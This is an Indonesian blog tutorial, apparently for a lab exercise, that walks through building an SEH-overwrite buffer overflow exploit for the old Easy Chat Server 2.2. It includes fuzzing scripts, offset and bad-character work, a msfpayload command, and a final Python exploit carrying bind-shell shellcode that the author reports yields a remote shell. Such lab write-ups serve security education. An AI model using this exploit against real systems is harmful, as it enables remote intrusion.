Jumat, 04 April 2014

Experimen BoF Ke-5

Hari ini kita akan belajar untuk memahami cara kerja dari buffer overflow dengan menggunakan software yang ada di pasaran, tapi tentu nya versi software tersebut sudah lama dan sudah terdapat public exploit nya juga, di sini kita akan mencoba membuat exploit versi sendiri, tapi ada sedikit perbedaan dengan experimen kita sebelumnya, buffer overflow yang sekarang menggunakan teknik SEH chain, jadi agak sedikit lebih rumit, semoga bisa di ikuti ya hehe ;)
Hal-hal yang perlu di persiapkan adalah :
- 2 OS yang berisi masing-masing VM Kali Linux ( sebagai attacker)  dan VM Windows 7 ( sebagai korban )
- Immunity Debugger
- aplikasi Easy_Chat_Server_2.2.exe, yg bisa di download di sini ( 1 2 3)
- script pvefindaddr.py, yg bisa di download di sini
Letakan script ini di folder pyCommands di dalam hasil instalasi Immunity Debuger
- contoh penampakan software Easy_Chat_Server_2.2


- sedikit pemahaman tentang python di perlukan :D

Langkah pertama:
Kita mencoba untuk mengirimkan suatu string "A" sebanyak-banyaknya sampai aplikasi tersebut mengalami crash, dalam contoh aplikasi ini saya akan mengirimkan sebanyak 2000.
Script yang di gunakan seperti berikut:

#!/usr/bin/python
import socket

host = '10.7.9.248'
port = 81

def fuzz(payload):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload)
        s.shutdown
        s.close

print "Attacking {0}:{1} ...".format(host, port)
command = "GET /chat.ghp?username="
command += "A" * 2000
command += "&password=test&room=1&sex=2 HTTP/1.1\r\n\r\n"
print "command {0} chars ...".format(len(command))
fuzz(command)

Dan ternyata aplikasi mengalami crash, tapi tidak seperti eksperimen kita sebelum nya :(

Jadi untuk melihat hasil crash nya, ada perlakuan khusus untuk kasus ini. Dari Immunity Debugger pilih menu View > SEH chain, seperti pada gambar di bawah ini

Kemudian klik kanan di value "41414141", pilih Follow address in stack, maka baru bisa terlihat crash nya, seperti pada gambar di bawah ini.


Langkah kedua:
Setelah aplikasi mengalami crash di string "A" sebanyak 2000, sekarang kita akan membuat pattern string sebanyak 2000 juga, seperti pada gambar di bawah ini :


Langkah ketiga:
Edit script sebelumnya dengan menambahkan string dari langkah kedua, seperti berikut ini:
#!/usr/bin/python
import socket

host = '10.7.9.248'
port = 81

def fuzz(payload):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload)
        s.shutdown
        s.close

print "Attacking {0}:{1} ...".format(host, port)
command = "GET /chat.ghp?username="
command += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
command += "&password=test&room=1&sex=2 HTTP/1.1\r\n\r\n"
print "command {0} chars ...".format(len(command))
fuzz(command)
Di sini kita fokus di bagian "Pointer to next SEH record " dan "SE handler", seperti pada gambar di bawah ini:

Langkah keempat:
Sekarang kita perlu mengetahui posisi "Pointer to next SEH record " dan "SE handler" berada di mana dengan menggunakan perintah seperti pada gambar di bawah ini:


Langkah kelima:
Saat nya kita coba lagi dengan lebih detil jumlah string yang harus di kirim kan sesuai dengan hasil di atas ;) Kemudian kita belajar untuk mengetahui apa saja karakter yang di larang, agar saat membuat payload shell tidak menjadi masalah ;)
Untuk buat script generate karakternya, bisa cek di sini

Edit script sebelumnya dengan menambahkan detil informasi yang kita dapat dari proses sebelumnya, seperti berikut:
#!/usr/bin/python
import socket

host = '10.7.9.248'
port = 81

def fuzz(payload):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload)
        s.shutdown
        s.close


offsets = {
        'NXT':216,# pointer to next seh record
        'SEh':220 # se handler
}

print "Attacking {0}:{1} ...".format(host, port)
command = "GET /chat.ghp?username="
command += "A" * (offsets['NXT'])
command += "B" * 4 # selanjutnya di ganti jmp 6 bytes dan nop sleed
command += "C" * 4 # selanjutnya di ganti alamat POP POP RETN
command += "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
command += "D" * 2000
command += "&password=test&room=1&sex=2 HTTP/1.1\r\n\r\n"
print "command {0} chars ...".format(len(command))
fuzz(command)
Dan ternyata hasil nya masih ada keanehan, berarti kita harus uji coba dengan menghapus karakter dari hasil generate ./a.out.

Sekarang kita coba hapus karakter "\x00\x20", kemudian jalankan script tersebut. Dan akhirnya karakter yang muncul sudah teratur, seperti pada gambar berikut ini:

Berikut nya kita mencari alamat memory yang berisi POP POP RETN di file dll ini yang sifat nya tidak safe. Kita menggunakan script pvefindaddr.py, cara menjalankan nya di Immunity, pilih View > Executables modules, ketik !pvefindaddr modules, tunggu sampai proses selesai, seperti gambar di bawah ini:


Kemudian pilih View > Log, ketik !pvefindaddr nosafeseh, tunggu sampai proses selesai. Dari sini kita akan mendapatkan info SEH yang tidak safe, termasuk target kita, seperti gambar di bawah ini:

Berikut nya kita pilih View > Executables modules, klik file dll yang tidak safe tersebut (SSLEAY92.dll). Kemudian klik kanan di area kolom pojok kiri atas, pilih Search for > Sequence of commands, kemudian input seperti ini:
Tekan Ctrl+L untuk mencari alamat POP POP RETN yang lain dan memang ternyata ada banyak. Ambil salah satu nya saja tapi yang tidak mengandung karakter yang di larang, kita ambil contoh seperti gambar berikut:



Sekarang saat nya membuat payload shell nya dan jangan lupa pastikan payload shell kita tidak terdapat karakter yang di larang tersebut.

Langkah keenam:
Kita buat payload shell di Kali Linux dengan menggunakan perintah berikut:
msfpayload windows/shell_bind_tcp EXITFUNC=seh R | msfencode -a x86 -b "\x00\x20" -t c
Kemudian edit script kita, untuk menambahkan script payload shell tersebut, seperti berikut:
#!/usr/bin/python
import socket

host = '10.7.9.248'
port = 81


def fuzz(payload):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload)
        s.shutdown
        s.close

offsets = {
        'NXT':216,# pointer to next seh record
        'SEh':220 # se handler
}

print "Attacking {0}:{1} ...".format(host, port)
command = "GET /chat.ghp?username="
command += "A" * (offsets['NXT'])
command += "\xeb\x06\x90\x90" # jmp 6 bytes dan nop sleed 2x
command += "\x77\x81\x01\x10" # alamat POP POP RETN
command += ("\xbb\xdf\xba\x3a\xeb\xdb\xdf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x56\x31\x58\x13\x83\xc0\x04\x03\x58\xd0\x58\xcf\x17\x06\x15"
"\x30\xe8\xd6\x46\xb8\x0d\xe7\x54\xde\x46\x55\x69\x94\x0b\x55"
"\x02\xf8\xbf\xee\x66\xd5\xb0\x47\xcc\x03\xfe\x58\xe0\x8b\xac"
"\x9a\x62\x70\xaf\xce\x44\x49\x60\x03\x84\x8e\x9d\xeb\xd4\x47"
"\xe9\x59\xc9\xec\xaf\x61\xe8\x22\xa4\xd9\x92\x47\x7b\xad\x28"
"\x49\xac\x1d\x26\x01\x54\x16\x60\xb2\x65\xfb\x72\x8e\x2c\x70"
"\x40\x64\xaf\x50\x98\x85\x81\x9c\x77\xb8\x2d\x11\x89\xfc\x8a"
"\xc9\xfc\xf6\xe8\x74\x07\xcd\x93\xa2\x82\xd0\x34\x21\x34\x31"
"\xc4\xe6\xa3\xb2\xca\x43\xa7\x9d\xce\x52\x64\x96\xeb\xdf\x8b"
"\x79\x7a\x9b\xaf\x5d\x26\x78\xd1\xc4\x82\x2f\xee\x17\x6a\x90"
"\x4a\x53\x99\xc5\xed\x3e\xf6\x2a\xc0\xc0\x06\x24\x53\xb2\x34"
"\xeb\xcf\x5c\x75\x64\xd6\x9b\x7a\x5f\xae\x34\x85\x5f\xcf\x1d"
"\x42\x0b\x9f\x35\x63\x33\x74\xc6\x8c\xe6\xdb\x96\x22\x58\x9c"
"\x46\x83\x08\x74\x8d\x0c\x77\x64\xae\xc6\x0e\xa2\x60\x32\x43"
"\x45\x81\xc4\x72\xc9\x0c\x22\x1e\xe1\x58\xfc\xb6\xc3\xbe\x35"
"\x21\x3b\x95\x69\xfa\xab\xa1\x67\x3c\xd3\x31\xa2\x6f\x78\x99"
"\x25\xfb\x92\x1e\x57\xfc\xbe\x36\x1e\xc5\x29\xcc\x4e\x84\xc8"
"\xd1\x5a\x7e\x68\x43\x01\x7e\xe7\x78\x9e\x29\xa0\x4f\xd7\xbf"
"\x5c\xe9\x41\xdd\x9c\x6f\xa9\x65\x7b\x4c\x34\x64\x0e\xe8\x12"
"\x76\xd6\xf1\x1e\x22\x86\xa7\xc8\x9c\x60\x1e\xbb\x76\x3b\xcd"
"\x15\x1e\xba\x3d\xa6\x58\xc3\x6b\x50\x84\x72\xc2\x25\xbb\xbb"
"\x82\xa1\xc4\xa1\x32\x4d\x1f\x62\x4c\xbf\xad\x7f\xd9\x66\x44"
"\xc2\x87\x98\xb3\x01\xbe\x1a\x31\xfa\x45\x02\x30\xff\x02\x84"
"\xa9\x8d\x1b\x61\xcd\x22\x1b\xa0")
command += "&password=test&room=1&sex=2 HTTP/1.1\r\n\r\n"print "command {0} chars ...".format(len(command))
fuzz(command)
Selanjutnya kita perlu uji coba script tersebut, jika memang aplikasi tidak crash, harus nya kita sudah mendapatkan shell nya, berikut uji coba nya:



Dari hasil di atas, tampak aplikasi tidak crash dan juga kita berhasil mendapatkan shell nya.

Note:
Sebagai latihan, bisa mencoba dengan menggunakan OS Windows yang lain nya, untuk mengetahui perbedaan nya seperti apa ;)
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)